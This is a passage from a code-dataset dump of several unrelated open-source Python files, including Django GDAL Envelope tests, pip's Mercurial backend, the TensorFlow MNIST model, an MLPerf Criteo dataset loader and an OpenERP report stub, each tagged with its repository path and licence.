            self.agg[agg_name].update({"aggs": {}})
            if not isinstance(sub_agg, list):
                sub_agg = [sub_agg]
            for sub in sub_agg:
                self.agg[agg_name]['aggs'].update(sub.agg)
    def _update_dict(self, qdict):
        # Recursively replace Query instances in a nested dict by their
        # underlying query dictionaries.
        for k, v in qdict.items():
            if isinstance(v, dict):
                qdict[k] = self._update_dict(v)
            else:
                qdict[k] = self._get_query(v)
        return qdict
    @classmethod
    def _get_query(cls, q):
        ''' Given a Query instance then return the Query dictionary. '''
        if hasattr(q, 'query'):
            return q.query
        return q
    @classmethod
    def _array_types(cls, arr, atype):
        ''' Evaluate if array contents are atype objects. '''
        if not all(isinstance(y, (atype)) for y in arr):
            raise AggregationError("not a "+str(atype))
        return True
| gpl-3.0 |
areski/django | tests/gis_tests/gdal_tests/test_envelope.py | 335 | 3667 | import unittest
from unittest import skipUnless
from django.contrib.gis.gdal import HAS_GDAL
if HAS_GDAL:
from django.contrib.gis.gdal import Envelope, GDALException
class TestPoint(object):
    """Minimal point stub exposing ``x``/``y`` attributes for envelope tests."""

    def __init__(self, x, y):
        self.x, self.y = x, y
@skipUnless(HAS_GDAL, "GDAL is required")
class EnvelopeTest(unittest.TestCase):
    """Tests for django.contrib.gis.gdal.Envelope construction, properties,
    equivalence and the various expand_to_include overloads."""
    def setUp(self):
        # Base envelope shared by the expand_to_include tests.
        self.e = Envelope(0, 0, 5, 5)
    def test01_init(self):
        "Testing Envelope initialization."
        e1 = Envelope((0, 0, 5, 5))
        Envelope(0, 0, 5, 5)
        Envelope(0, '0', '5', 5)  # Thanks to ww for this
        Envelope(e1._envelope)
        # Inverted, wrong-arity, empty and non-numeric inputs must fail.
        self.assertRaises(GDALException, Envelope, (5, 5, 0, 0))
        self.assertRaises(GDALException, Envelope, 5, 5, 0, 0)
        self.assertRaises(GDALException, Envelope, (0, 0, 5, 5, 3))
        self.assertRaises(GDALException, Envelope, ())
        self.assertRaises(ValueError, Envelope, 0, 'a', 5, 5)
        self.assertRaises(TypeError, Envelope, 'foo')
        self.assertRaises(GDALException, Envelope, (1, 1, 0, 0))
        try:
            Envelope(0, 0, 0, 0)
        except GDALException:
            self.fail("shouldn't raise an exception for min_x == max_x or min_y == max_y")
    def test02_properties(self):
        "Testing Envelope properties."
        e = Envelope(0, 0, 2, 3)
        self.assertEqual(0, e.min_x)
        self.assertEqual(0, e.min_y)
        self.assertEqual(2, e.max_x)
        self.assertEqual(3, e.max_y)
        self.assertEqual((0, 0), e.ll)
        self.assertEqual((2, 3), e.ur)
        self.assertEqual((0, 0, 2, 3), e.tuple)
        self.assertEqual('POLYGON((0.0 0.0,0.0 3.0,2.0 3.0,2.0 0.0,0.0 0.0))', e.wkt)
        self.assertEqual('(0.0, 0.0, 2.0, 3.0)', str(e))
    def test03_equivalence(self):
        "Testing Envelope equivalence."
        e1 = Envelope(0.523, 0.217, 253.23, 523.69)
        e2 = Envelope((0.523, 0.217, 253.23, 523.69))
        self.assertEqual(e1, e2)
        self.assertEqual((0.523, 0.217, 253.23, 523.69), e1)
    def test04_expand_to_include_pt_2_params(self):
        "Testing Envelope expand_to_include -- point as two parameters."
        self.e.expand_to_include(2, 6)
        self.assertEqual((0, 0, 5, 6), self.e)
        self.e.expand_to_include(-1, -1)
        self.assertEqual((-1, -1, 5, 6), self.e)
    def test05_expand_to_include_pt_2_tuple(self):
        "Testing Envelope expand_to_include -- point as a single 2-tuple parameter."
        self.e.expand_to_include((10, 10))
        self.assertEqual((0, 0, 10, 10), self.e)
        self.e.expand_to_include((-10, -10))
        self.assertEqual((-10, -10, 10, 10), self.e)
    # NOTE(review): the next two methods both carry the "test06" prefix;
    # their full names differ so both still run, but the numbering is off.
    def test06_expand_to_include_extent_4_params(self):
        "Testing Envelope expand_to_include -- extent as 4 parameters."
        self.e.expand_to_include(-1, 1, 3, 7)
        self.assertEqual((-1, 0, 5, 7), self.e)
    def test06_expand_to_include_extent_4_tuple(self):
        "Testing Envelope expand_to_include -- extent as a single 4-tuple parameter."
        self.e.expand_to_include((-1, 1, 3, 7))
        self.assertEqual((-1, 0, 5, 7), self.e)
    def test07_expand_to_include_envelope(self):
        "Testing Envelope expand_to_include with Envelope as parameter."
        self.e.expand_to_include(Envelope(-1, 1, 3, 7))
        self.assertEqual((-1, 0, 5, 7), self.e)
    def test08_expand_to_include_point(self):
        "Testing Envelope expand_to_include with Point as parameter."
        self.e.expand_to_include(TestPoint(-1, 1))
        self.assertEqual((-1, 0, 5, 5), self.e)
        self.e.expand_to_include(TestPoint(10, 10))
        self.assertEqual((-1, 0, 10, 10), self.e)
| bsd-3-clause |
bjornlevi/5thpower | afmaeli/env/lib/python3.6/site-packages/pip/vcs/mercurial.py | 514 | 3472 | from __future__ import absolute_import
import logging
import os
import tempfile
from pip.utils import display_path, rmtree
from pip.vcs import vcs, VersionControl
from pip.download import path_to_url
from pip._vendor.six.moves import configparser
logger = logging.getLogger(__name__)
class Mercurial(VersionControl):
    """pip VCS backend for Mercurial (hg) repositories.

    Registered with the pip VCS registry at module import; all hg commands
    are executed through VersionControl.run_command.
    """

    name = 'hg'
    dirname = '.hg'
    repo_name = 'clone'
    schemes = ('hg', 'hg+http', 'hg+https', 'hg+ssh', 'hg+static-http')

    def export(self, location):
        """Export the Hg repository at the url to the destination location"""
        temp_dir = tempfile.mkdtemp('-export', 'pip-')
        self.unpack(temp_dir)
        try:
            self.run_command(
                ['archive', location], show_stdout=False, cwd=temp_dir)
        finally:
            # Always remove the temporary clone, even if archiving failed.
            rmtree(temp_dir)

    def switch(self, dest, url, rev_options):
        """Re-point the checkout at *dest* to *url*, then update it.

        Rewrites ``paths.default`` in the repository's hgrc.  On failure the
        problem is only logged and the working copy is left untouched.
        """
        repo_config = os.path.join(dest, self.dirname, 'hgrc')
        config = configparser.SafeConfigParser()
        try:
            config.read(repo_config)
            config.set('paths', 'default', url)
            with open(repo_config, 'w') as config_file:
                config.write(config_file)
        except (OSError, configparser.NoSectionError) as exc:
            logger.warning(
                'Could not switch Mercurial repository to %s: %s', url, exc,
            )
        else:
            # Only update the working copy when the hgrc rewrite succeeded.
            self.run_command(['update', '-q'] + rev_options, cwd=dest)

    def update(self, dest, rev_options):
        """Pull new changesets and update the working copy at *dest*."""
        self.run_command(['pull', '-q'], cwd=dest)
        self.run_command(['update', '-q'] + rev_options, cwd=dest)

    def obtain(self, dest):
        """Clone the URL into *dest* (skipped if check_destination declines)."""
        url, rev = self.get_url_rev()
        if rev:
            rev_options = [rev]
            rev_display = ' (to revision %s)' % rev
        else:
            rev_options = []
            rev_display = ''
        if self.check_destination(dest, url, rev_options, rev_display):
            logger.info(
                'Cloning hg %s%s to %s',
                url,
                rev_display,
                display_path(dest),
            )
            # Clone without a working copy first, then update to the
            # requested revision (or tip when no revision was given).
            self.run_command(['clone', '--noupdate', '-q', url, dest])
            self.run_command(['update', '-q'] + rev_options, cwd=dest)

    def get_url(self, location):
        """Return the default remote URL of the checkout at *location*."""
        url = self.run_command(
            ['showconfig', 'paths.default'],
            show_stdout=False, cwd=location).strip()
        if self._is_local_repository(url):
            # Normalize local filesystem paths to file:// URLs.
            url = path_to_url(url)
        return url.strip()

    def get_revision(self, location):
        """Return the local (numeric) revision of the working copy parent."""
        current_revision = self.run_command(
            ['parents', '--template={rev}'],
            show_stdout=False, cwd=location).strip()
        return current_revision

    def get_revision_hash(self, location):
        """Return the full changeset hash of the working copy parent."""
        current_rev_hash = self.run_command(
            ['parents', '--template={node}'],
            show_stdout=False, cwd=location).strip()
        return current_rev_hash

    def get_src_requirement(self, dist, location):
        """Build an ``hg+URL@hash#egg=name`` requirement string for *dist*."""
        repo = self.get_url(location)
        if not repo.lower().startswith('hg:'):
            repo = 'hg+' + repo
        egg_project_name = dist.egg_name().split('-', 1)[0]
        if not repo:
            return None
        current_rev_hash = self.get_revision_hash(location)
        return '%s@%s#egg=%s' % (repo, current_rev_hash, egg_project_name)

    def check_version(self, dest, rev_options):
        """Always assume the versions don't match"""
        return False

vcs.register(Mercurial)
| mit |
keshr3106/ThinkStats2 | code/mystery.py | 68 | 1578 | """This file contains code used in "Think Stats",
by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function
import random
import numpy as np
import scipy.stats
def write_sample(sample, filename):
    """Write a sequence of floats to a file, one '%f'-formatted value per line."""
    with open(filename, 'w') as outfile:
        for value in sample:
            outfile.write('%f\n' % value)
def uniform_sample(n):
    """Draw n values uniformly from [0, 100]."""
    return [random.uniform(0, 100) for _ in range(n)]
def triangular_sample(n):
    """Draw n values from a triangular distribution on [0, 100]."""
    return [random.triangular(0, 100) for _ in range(n)]
def expo_sample(n):
    """Draw n values from an exponential distribution with mean 50."""
    return [random.expovariate(1.0 / 50) for _ in range(n)]
def gauss_sample(n):
    """Draw n values from a normal distribution (mu=50, sigma=25)."""
    return [random.gauss(50, 25) for _ in range(n)]
def lognorm_sample(n):
    """Draw n values from a lognormal distribution (mu=3, sigma=1.3)."""
    return [random.lognormvariate(3, 1.3) for _ in range(n)]
def pareto_sample(n):
    """Draw n values from a Pareto distribution (alpha=1.2) scaled by 10."""
    return [10 * random.paretovariate(1.2) for _ in range(n)]
def weibull_sample(n):
    """Draw n values from a Weibull distribution (scale=60, shape=5)."""
    return [random.weibullvariate(60, 5) for _ in range(n)]
def gumbel_sample(n):
    """Draw n values from a Gumbel distribution (loc=45, scale=10)."""
    return scipy.stats.gumbel_r(45, 10).rvs(n)
def main():
    """Generate 1000 samples from each distribution and dump them to files.

    Writes mystery0.dat .. mystery7.dat into the current working directory
    (one file per distribution, ordered as in `funcs`) and prints each
    sample mean so the files can later be matched back to a distribution.
    """
    funcs = [uniform_sample, triangular_sample, expo_sample,
             gauss_sample, lognorm_sample, pareto_sample,
             weibull_sample, gumbel_sample]

    for i in range(len(funcs)):
        sample = funcs[i](1000)
        print(np.mean(sample))
        filename = 'mystery%d.dat' % i
        write_sample(sample, filename)

if __name__ == '__main__':
    main()
| gpl-3.0 |
benedictpaten/marginPhase | toil/src/toil_marginphase/scripts/chunking_analysis.py | 1 | 1756 | #!/usr/bin/env python
from __future__ import print_function
import argparse
import glob
import gzip
import math
import numpy as np
import os
def parse_args(argv=None):
    """Parse command-line options for the chunking analysis.

    Args:
        argv: optional list of argument strings.  Defaults to None, in which
            case argparse falls back to sys.argv[1:] (the original behavior),
            so existing callers are unaffected while the parser becomes
            directly testable.

    Returns:
        argparse.Namespace with log_dir, full_vcf_dir and merged_vcf_dir.
    """
    parser = argparse.ArgumentParser("Analyzes chunks from curated marginPhase output and logfiles")
    parser.add_argument('--log_dir', '-l', dest='log_dir', required=True, type=str,
                        help='Location where logs are')
    parser.add_argument('--full_vcf_dir', '-f', dest='full_vcf_dir', required=True, type=str,
                        help='Location where full vcfs are')
    parser.add_argument('--merged_vcf_dir', '-m', dest='merged_vcf_dir', required=True, type=str,
                        help='Location where merged vcfs are')
    return parser.parse_args(argv)
def main():
    """Verify that every expected output file exists for each sample.

    For every '<uuid>.merged.full.vcf' in the full-VCF directory, checks that
    the matching merged VCFs and the merge-chunks log exist.  Raises
    AssertionError on the first missing file or directory.
    """
    args = parse_args()
    assert False not in map(os.path.isdir, [args.log_dir, args.full_vcf_dir, args.merged_vcf_dir])

    # BUG FIX: str.rstrip('merged.full.vcf') strips a *character set*, not a
    # suffix, so it could also eat trailing characters of the uuid itself
    # (any uuid ending in one of 'm e r g d . f u l v c').  Remove the
    # literal suffix instead, skipping files that do not match the pattern.
    # sorted() also fixes the Python 3 crash of calling .sort() on a map object.
    suffix = ".merged.full.vcf"
    uuids = sorted(name[:-len(suffix)]
                   for name in os.listdir(args.full_vcf_dir)
                   if name.endswith(suffix))

    for uuid in uuids:
        print(uuid)
        # Exactly one of 'np' (nanopore) / 'pb' (pacbio) must appear in the uuid.
        assert ("np" in uuid) != ("pb" in uuid)
        nanopore = "np" in uuid
        chunk_type = uuid.split(".")[-1]
        full_vcf = os.path.join(args.full_vcf_dir, "{}.merged.full.vcf".format(uuid))
        merged_vcf_files = glob.glob(os.path.join(args.merged_vcf_dir, "{}/{}.merged.*.vcf"
                                                  .format("np" if nanopore else "pb", uuid)))
        log_file = os.path.join(args.log_dir, "merge_chunks/{}.toil-marginPhase.19q.{}.merge_chunks.log"
                                .format("np" if nanopore else "pb", chunk_type))
        assert (False not in map(os.path.isfile, [full_vcf, log_file])) and len(merged_vcf_files) != 0

if __name__ == "__main__":
    main()
mengxn/tensorflow | tensorflow/examples/tutorials/mnist/mnist.py | 65 | 5292 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Builds the MNIST network.
Implements the inference/loss/training pattern for model building.
1. inference() - Builds the model as far as is required for running the network
forward to make predictions.
2. loss() - Adds to the inference model the layers required to generate loss.
3. training() - Adds to the loss model the Ops required to generate and
apply gradients.
This file is used by the various "fully_connected_*.py" files and not meant to
be run.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import tensorflow as tf
# The MNIST dataset has 10 classes, representing the digits 0 through 9.
NUM_CLASSES = 10
# The MNIST images are always 28x28 pixels.
IMAGE_SIZE = 28
IMAGE_PIXELS = IMAGE_SIZE * IMAGE_SIZE
def inference(images, hidden1_units, hidden2_units):
  """Build the MNIST model up to where it may be used for inference.

  Args:
    images: Images placeholder, from inputs().  Expected shape
        [batch_size, IMAGE_PIXELS].
    hidden1_units: Size of the first hidden layer.
    hidden2_units: Size of the second hidden layer.

  Returns:
    softmax_linear: Output tensor with the computed logits,
        shape [batch_size, NUM_CLASSES].
  """
  # Hidden 1
  with tf.name_scope('hidden1'):
    # Weights drawn from a truncated normal scaled by 1/sqrt(fan_in),
    # which keeps the initial pre-activations near unit variance.
    weights = tf.Variable(
        tf.truncated_normal([IMAGE_PIXELS, hidden1_units],
                            stddev=1.0 / math.sqrt(float(IMAGE_PIXELS))),
        name='weights')
    biases = tf.Variable(tf.zeros([hidden1_units]),
                         name='biases')
    hidden1 = tf.nn.relu(tf.matmul(images, weights) + biases)
  # Hidden 2
  with tf.name_scope('hidden2'):
    weights = tf.Variable(
        tf.truncated_normal([hidden1_units, hidden2_units],
                            stddev=1.0 / math.sqrt(float(hidden1_units))),
        name='weights')
    biases = tf.Variable(tf.zeros([hidden2_units]),
                         name='biases')
    hidden2 = tf.nn.relu(tf.matmul(hidden1, weights) + biases)
  # Linear
  with tf.name_scope('softmax_linear'):
    # No softmax here: loss() applies it internally via
    # sparse_softmax_cross_entropy_with_logits.
    weights = tf.Variable(
        tf.truncated_normal([hidden2_units, NUM_CLASSES],
                            stddev=1.0 / math.sqrt(float(hidden2_units))),
        name='weights')
    biases = tf.Variable(tf.zeros([NUM_CLASSES]),
                         name='biases')
    logits = tf.matmul(hidden2, weights) + biases
  return logits
def loss(logits, labels):
  """Calculates the loss from the logits and the labels.

  Args:
    logits: Logits tensor, float - [batch_size, NUM_CLASSES].
    labels: Labels tensor, int32 - [batch_size].

  Returns:
    loss: Loss tensor of type float (mean cross-entropy over the batch).
  """
  int64_labels = tf.to_int64(labels)
  per_example_xent = tf.nn.sparse_softmax_cross_entropy_with_logits(
      labels=int64_labels, logits=logits, name='xentropy')
  return tf.reduce_mean(per_example_xent, name='xentropy_mean')
def training(loss, learning_rate):
  """Sets up the training Ops.

  Creates a summarizer to track the loss over time in TensorBoard,
  builds a gradient descent optimizer, and returns the Op that must be
  passed to `sess.run()` to perform one training step (which also
  increments the global step counter).

  Args:
    loss: Loss tensor, from loss().
    learning_rate: The learning rate to use for gradient descent.

  Returns:
    train_op: The Op for training.
  """
  # Scalar summary so the loss curve shows up in TensorBoard.
  tf.summary.scalar('loss', loss)
  sgd = tf.train.GradientDescentOptimizer(learning_rate)
  # Non-trainable counter, incremented once per minimize() call.
  global_step = tf.Variable(0, name='global_step', trainable=False)
  return sgd.minimize(loss, global_step=global_step)
def evaluation(logits, labels):
  """Evaluate the quality of the logits at predicting the label.

  Args:
    logits: Logits tensor, float - [batch_size, NUM_CLASSES].
    labels: Labels tensor, int32 - [batch_size], with values in the
      range [0, NUM_CLASSES).

  Returns:
    A scalar int32 tensor with the number of examples (out of batch_size)
    that were predicted correctly.
  """
  # in_top_k with k=1 marks an example correct when its label has the
  # single highest logit; summing the bool tensor counts the hits.
  hits = tf.nn.in_top_k(logits, labels, 1)
  return tf.reduce_sum(tf.cast(hits, tf.int32))
| apache-2.0 |
mlperf/inference_results_v0.7 | closed/Neuchips/code/dlrm-99/Server/python/criteo.py | 1 | 14814 | """
implementation of criteo dataset
"""
# pylint: disable=unused-argument,missing-docstring
import logging
import os
import sys
import re
import time
import random
import numpy as np
import sklearn.metrics
import inspect
# pytorch
import torch
from torch.utils.data import Dataset, RandomSampler
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("criteo")
# add dlrm code path
try:
dlrm_dir_path = os.environ['DLRM_DIR']
sys.path.append(dlrm_dir_path)
except KeyError:
print("ERROR: Please set DLRM_DIR environment variable to the dlrm code location")
sys.exit(0)
#import dataset
import dlrm_data_pytorch as dp
import data_loader_terabyte
class Criteo(Dataset):
    """MLPerf-inference wrapper around the Criteo click-log dataset.

    Wraps dlrm_data_pytorch / data_loader_terabyte datasets and groups
    individual samples into fixed- or variable-size "aggregated" queries,
    implementing the LoadGen dataset protocol (load/unload/get samples).
    """

    def __init__(self,
                 model,
                 data_path,
                 name,
                 pre_process,
                 use_cache,
                 count=None,
                 samples_to_aggregate_fix=None,
                 samples_to_aggregate_min=None,
                 samples_to_aggregate_max=None,
                 samples_to_aggregate_quantile_file=None,
                 samples_to_aggregate_trace_file=None,
                 test_num_workers=0,
                 max_ind_range=-1,
                 sub_sample_rate=0.0,
                 mlperf_bin_loader=False,
                 randomize="total",
                 memory_map=False):
        """Load the test split and precompute query (aggregation) offsets.

        Fixed-size queries use samples_to_aggregate_fix; variable-size
        queries are drawn either uniformly from [min, max] or from a custom
        quantile file.  `name` must be "kaggle" or "terabyte".
        """
        super().__init__()
        self.model = model
        self.count = count

        self.random_offsets = []
        # Fixed size unless a quantile file or a (min, max) pair is given.
        self.use_fixed_size = ((samples_to_aggregate_quantile_file is None) and
                               (samples_to_aggregate_min is None or samples_to_aggregate_max is None))
        if self.use_fixed_size:
            # fixed size queries
            self.samples_to_aggregate = 1 if samples_to_aggregate_fix is None else samples_to_aggregate_fix
            self.samples_to_aggregate_min = None
            self.samples_to_aggregate_max = None
        else:
            # variable size queries
            self.samples_to_aggregate = 1
            self.samples_to_aggregate_min = samples_to_aggregate_min
            self.samples_to_aggregate_max = samples_to_aggregate_max
        self.samples_to_aggregate_quantile_file = samples_to_aggregate_quantile_file

        if name == "kaggle":
            raw_data_file = data_path + "/train.txt"
            processed_data_file = data_path + "/kaggleAdDisplayChallenge_processed.npz"
        elif name == "terabyte":
            raw_data_file = data_path + "/day"
            processed_data_file = data_path + "/terabyte_processed.npz"
        else:
            raise ValueError("only kaggle|terabyte dataset options are supported")
        # The fast binary loader is only available for memory-mapped terabyte.
        self.use_mlperf_bin_loader = mlperf_bin_loader and memory_map and name == "terabyte"

        # debug prints
        # print("dataset filenames", raw_data_file, processed_data_file)

        self.test_data = dp.CriteoDataset(
            dataset=name,
            max_ind_range=max_ind_range,
            sub_sample_rate=sub_sample_rate,
            randomize=randomize,
            split="test",
            raw_path=raw_data_file,
            pro_data=processed_data_file,
            memory_map=memory_map
        )
        self.num_individual_samples = len(self.test_data)

        if self.use_mlperf_bin_loader:
            test_file = data_path + "/terabyte_processed_test.bin"
            counts_file = raw_data_file + '_fea_count.npz'

            data_loader_terabyte.numpy_to_binary(
                input_files=[raw_data_file + '_23_reordered.npz'],
                output_file_path=data_path + "/terabyte_processed_test.bin",
                split="test")

            self.test_data = data_loader_terabyte.CriteoBinDataset(
                data_file=test_file,
                counts_file=counts_file,
                batch_size=self.samples_to_aggregate,
                max_ind_range=max_ind_range
            )

            # Batching is done inside CriteoBinDataset, hence batch_size=None.
            self.test_loader = torch.utils.data.DataLoader(
                self.test_data,
                batch_size=None,
                batch_sampler=None,
                shuffle=False,
                num_workers=0,
                collate_fn=None,
                pin_memory=False,
                drop_last=False,
            )
        else:
            self.test_loader = torch.utils.data.DataLoader(
                self.test_data,
                batch_size=self.samples_to_aggregate,
                shuffle=False,
                num_workers=test_num_workers,
                collate_fn=dp.collate_wrapper_criteo,
                pin_memory=False,
                drop_last=False,
            )

        # WARNING: Note that the orignal dataset returns number of samples, while the
        # binary dataset returns the number of batches. Therefore, when using a mini-batch
        # of size samples_to_aggregate as an item we need to adjust the original dataset item_count.
        # On the other hand, data loader always returns number of batches.
        if self.use_fixed_size:
            # the offsets for fixed query size will be generated on-the-fly later on
            print("Using fixed query size: " + str(self.samples_to_aggregate))
            if self.use_mlperf_bin_loader:
                self.num_aggregated_samples = len(self.test_data)
                # self.num_aggregated_samples2 = len(self.test_loader)
            else:
                # ceil-division so the final partial query is counted too
                self.num_aggregated_samples = (self.num_individual_samples + self.samples_to_aggregate - 1) // self.samples_to_aggregate
                # self.num_aggregated_samples2 = len(self.test_loader)
        else:
            # the offsets for variable query sizes will be pre-generated here
            if self.samples_to_aggregate_quantile_file is None:
                # generate number of samples in a query from a uniform(min,max) distribution
                print("Using variable query size: uniform distribution (" + str(self.samples_to_aggregate_min) + "," + str(self.samples_to_aggregate_max) + ")")
                done = False
                qo = 0
                while done == False:
                    self.random_offsets.append(int(qo))
                    qs = random.randint(self.samples_to_aggregate_min, self.samples_to_aggregate_max)
                    qo = min(qo + qs, self.num_individual_samples)
                    if qo >= self.num_individual_samples:
                        done = True
                self.random_offsets.append(int(qo))

                # compute min and max number of samples
                nas_max = (self.num_individual_samples + self.samples_to_aggregate_min - 1) // self.samples_to_aggregate_min
                nas_min = (self.num_individual_samples + self.samples_to_aggregate_max - 1) // self.samples_to_aggregate_max
            else:
                # generate number of samples in a query from a custom distribution,
                # with quantile (inverse of its cdf) given in the file. Note that
                # quantile is related to the concept of percentile in statistics.
                #
                # For instance, assume that we have the following distribution for query length
                # length = [100, 200, 300, 400, 500, 600, 700] # x
                # pdf = [0.1, 0.6, 0.1, 0.05, 0.05, 0.05, 0.05] # p(x)
                # cdf = [0.1, 0.7, 0.8, 0.85, 0.9, 0.95, 1.0] # f(x) = prefix-sum of p(x)
                # The inverse of its cdf with granularity of 0.05 can be written as
                # quantile_p = [.05, .10, .15, .20, .25, .30, .35, .40, .45, .50, .55, .60, .65, .70, .75, .80, .85, .90, .95, 1.0] # p
                # quantile_x = [100, 100, 200, 200, 200, 200, 200, 200, 200, 200, 200, 200, 200, 200, 300, 300, 400, 500, 600, 700] # q(p) = x, such that f(x) >= p
                # Notice that once we have quantile, we can apply inverse transform sampling method.
                print("Using variable query size: custom distribution (file " + str(samples_to_aggregate_quantile_file) + ")")
                with open(self.samples_to_aggregate_quantile_file, 'r') as f:
                    line = f.readline()
                    quantile = np.fromstring(line, dtype=int, sep=", ")
                # debug prints
                # print(quantile)
                # print(len(quantile))

                l = len(quantile)
                done = False
                qo = 0
                while done == False:
                    self.random_offsets.append(int(qo))
                    # inverse transform sampling: pick a random quantile entry
                    pr = np.random.randint(low=0, high=l)
                    qs = quantile[pr]
                    qo = min(qo + qs, self.num_individual_samples)
                    if qo >= self.num_individual_samples:
                        done = True
                self.random_offsets.append(int(qo))

                # compute min and max number of samples
                nas_max = (self.num_individual_samples + quantile[0] - 1) // quantile[0]
                nas_min = (self.num_individual_samples + quantile[-1]- 1) // quantile[-1]

            # reset num_aggregated_samples
            self.num_aggregated_samples = len(self.random_offsets) - 1

            # check num_aggregated_samples
            if self.num_aggregated_samples < nas_min or nas_max < self.num_aggregated_samples:
                raise ValueError("Sannity check failed")

        # limit number of items to count if needed
        if self.count is not None:
            self.num_aggregated_samples = min(self.count, self.num_aggregated_samples)

        # dump the trace of aggregated samples
        if samples_to_aggregate_trace_file is not None:
            with open(samples_to_aggregate_trace_file, 'w') as f:
                for l in range(self.num_aggregated_samples):
                    if self.use_fixed_size:
                        s = l * self.samples_to_aggregate
                        e = min((l + 1) * self.samples_to_aggregate, self.num_individual_samples)
                    else:
                        s = self.random_offsets[l]
                        e = self.random_offsets[l+1]
                    f.write(str(s) + ", " + str(e) + ", " + str(e-s) + "\n")

    def get_item_count(self):
        """Return the number of aggregated queries (not individual samples)."""
        # get number of items in the dataset
        return self.num_aggregated_samples

    ''' lg compatibilty routine '''
    def unload_query_samples(self, sample_list):
        """LoadGen hook: drop all cached query samples."""
        self.items_in_memory = {}

    ''' lg compatibilty routine '''
    def load_query_samples(self, sample_list):
        """LoadGen hook: pre-load and collate the queries in *sample_list*."""
        self.items_in_memory = {}

        # WARNING: notice that while DataLoader is iterable-style, the Dataset
        # can be iterable- or map-style, and Criteo[Bin]Dataset are the latter
        # This means that we can not index into DataLoader, but can enumerate it,
        # while we can index into the dataset itself.
        for l in sample_list:
            # approach 1: single sample as an item
            '''
            self.items_in_memory[l] = self.test_data[l]
            '''
            # approach 2: multiple samples as an item
            if self.use_fixed_size:
                s = l * self.samples_to_aggregate
                e = min((l + 1) * self.samples_to_aggregate, self.num_individual_samples)
            else:
                s = self.random_offsets[l]
                e = self.random_offsets[l+1]

            ls = [self.test_data[i] for i in range(s, e)]
            if self.use_mlperf_bin_loader:
                # NOTE: in binary dataset the values are transformed
                ls_t = list(zip(*ls))
                X = torch.cat(ls_t[0])
                lS_i = torch.cat(ls_t[2], dim=1)
                T = torch.cat(ls_t[3])
                d, s = self.model.collate_pre(X, lS_i)
                exp = self.model.collate_post(d, s)
                # cache (targets, model-collated payload) per query id
                self.items_in_memory[l] = (T, exp)
            else:
                # NOTE: in original dataset the values are not transformed
                # and collate besides stacking them also transforms them
                self.items_in_memory[l] = self.test_loader.collate_fn(ls)

        self.last_loaded = time.time()

    ''' lg compatibilty routine '''
    def get_samples(self, id_list):
        """Return (targets, per-query index offsets, collated payload) for *id_list*."""
        # build list tuples as need by the batch conversion routine
        # index i from id_list corresponds to a particular query_id
        idx_offsets = [0]
        ls = []
        for i in id_list:
            (T, _) = self.items_in_memory[i]
            idx_offsets.append(idx_offsets[-1] + T.numel())
            ls.append(self.items_in_memory[i])

        # debug prints
        # print(idx_offsets)

        # approach 1: collate a mini-batch of single samples
        '''
        if self.use_mlperf_bin_loader:
            # NOTE: in binary dataset the values are transformed
            ls_t = list(zip(*ls))
            X = torch.cat(ls_t[0])
            (num_s, len_ls) = torch.cat(ls_t[1], dim=1).size()
            lS_o = torch.stack([torch.tensor(range(len_ls)) for _ in range(num_s)])
            lS_i = torch.cat(ls_t[2], dim=1)
            T = torch.cat(ls_t[3])
        else:
            # NOTE: in original dataset the values are not transformed and collate besides stacking transforms them
            X, lS_o, lS_i, T = self.test_loader.collate_fn(ls)
        '''
        # approach 2: collate a mini-batch of multiple samples
        # NOTE: recall that the samples have already been transformed for both datasets
        # (by earlier calls in load_query_samples), therefore we just need to stack them
        ls_t = list(zip(*ls))
        T = torch.cat(ls_t[0])
        exp = b''.join(ls_t[1])
        return (T, idx_offsets, exp)
# Pre processing
def pre_process_criteo_dlrm(x):
    """Identity pre-processing hook: Criteo samples need no transformation."""
    return x
# Post processing
class DlrmPostProcess:
    """Accumulates DLRM predictions and computes accuracy and ROC AUC."""

    def __init__(self):
        self.good = 0       # predictions whose rounded value matched the target
        self.total = 0      # samples scored so far
        self.roc_auc = 0
        self.results = []

    def __call__(self, results, expected=None, result_dict=None):
        """Score one batch and return (prediction, target) pairs as columns."""
        batch = np.asarray(results)
        targets = np.array(expected)
        self.good += int((batch.round() == targets).sum())
        self.total += len(results)
        return np.column_stack((batch, targets))

    def add_results(self, results):
        """Stash a batch of (prediction, target) rows for finalize()."""
        self.results.append(results)

    def start(self):
        """Reset all accumulators before a new run."""
        self.good = 0
        self.total = 0
        self.roc_auc = 0
        self.results = []

    def finalize(self, result_dict, ds=False, output_dir=None):
        """Compute the final AUC over all stashed batches; fill result_dict."""
        stacked = np.concatenate(self.results, axis=0)
        self.results = stacked
        predictions, targets = list(zip(*stacked))
        predictions = np.array(predictions)
        targets = np.array(targets)
        self.roc_auc = sklearn.metrics.roc_auc_score(targets, predictions)

        result_dict["good"] = self.good
        result_dict["total"] = self.total
        result_dict["roc_auc"] = self.roc_auc
| apache-2.0 |
darkleons/lama | addons/lunch/report/report_lunch_order.py | 341 | 2771 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import tools
from openerp.osv import fields,osv
class report_lunch_order(osv.osv):
    """Read-only statistics model backed by a SQL view that aggregates
    lunch order lines per user, date and note (standard OpenERP pattern:
    _auto = False, the view is (re)built in init())."""
    _name = "report.lunch.order.line"
    _description = "Lunch Orders Statistics"
    _auto = False
    _rec_name = 'date'
